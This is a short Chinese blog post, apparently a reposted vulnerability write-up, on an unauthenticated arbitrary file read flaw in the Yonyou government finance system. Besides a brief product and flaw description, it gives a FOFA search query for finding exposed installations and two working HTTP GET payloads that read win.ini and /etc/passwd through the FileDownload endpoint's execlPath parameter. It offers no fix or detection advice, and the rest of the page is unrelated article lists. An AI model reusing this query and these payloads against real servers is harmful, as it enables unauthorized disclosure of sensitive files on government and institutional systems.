【漏洞复现】用友政务财务系统 FileDownload 任意文件读取漏洞

  • 开发
  • 33

0x01 产品简介

用友政务财务系统是面向政府部门、事业单位、非赢利组织的全方位业务管理信息化解决方案提供商。该系统具备一系列的功能特点,能够满足不同规模和类型企业的财务管理需求。

0x02 漏洞概述

用友政务财务系统存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取服务器任意文件,造成敏感信息泄露。

0x03 测绘语句

测绘语句:fofa: app="用友-政务财务系统"

0x04 漏洞复现

payload——windows:GET /bg/attach/FileDownload?execlPath=C://Windows//win.ini HTTP/1.1

payload——linux:GET /bg/attach/FileDownload?execlPath=/etc/passwd HTTP/1.1

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-22 09:12:03       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-22 09:12:03       101 阅读

  9. 在Django里面运行非项目文件

    2024-04-22 09:12:03       82 阅读

  19. Python语言-面向对象

    2024-04-22 09:12:03       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-04-22 09:12:03       85 阅读

热门阅读

  2. ORAN每个端点和每个C平面消息的限制

    2024-04-22 09:12:03       39 阅读

  3. linux日志管理 rsyslogd 日志处理进程 和logrotate日志轮转

    2024-04-22 09:12:03       37 阅读

  4. Nginx日志

    2024-04-22 09:12:03       36 阅读

  5. centos 7.9 安装 ftp 传输文件

    2024-04-22 09:12:03       39 阅读

  10. 【AIGC调研系列】MiniMax 稀宇科技的abab 6.5 系列模型与国外先进模型相比的优缺点

    2024-04-22 09:12:03       38 阅读

  11. 爬虫(小案例)

    2024-04-22 09:12:03       34 阅读

  19. LeetCode hot100-29-Y

    2024-04-22 09:12:03       31 阅读

  20. 【AIGC调研系列】llama 3与GPT4相比的优劣点

    2024-04-22 09:12:03       43 阅读

  22. AI-windows下使用llama.cpp部署本地Chinese-LLaMA-Alpaca-2模型

    2024-04-22 09:12:03       28 阅读

  24. 【C++风云录】辐射现代大数据景观:从Apache Arrow到Thrust的全方位探索

    2024-04-22 09:12:03       34 阅读

  26. webpack -vite(Rollup )-Gulp (一)

    2024-04-22 09:12:03       33 阅读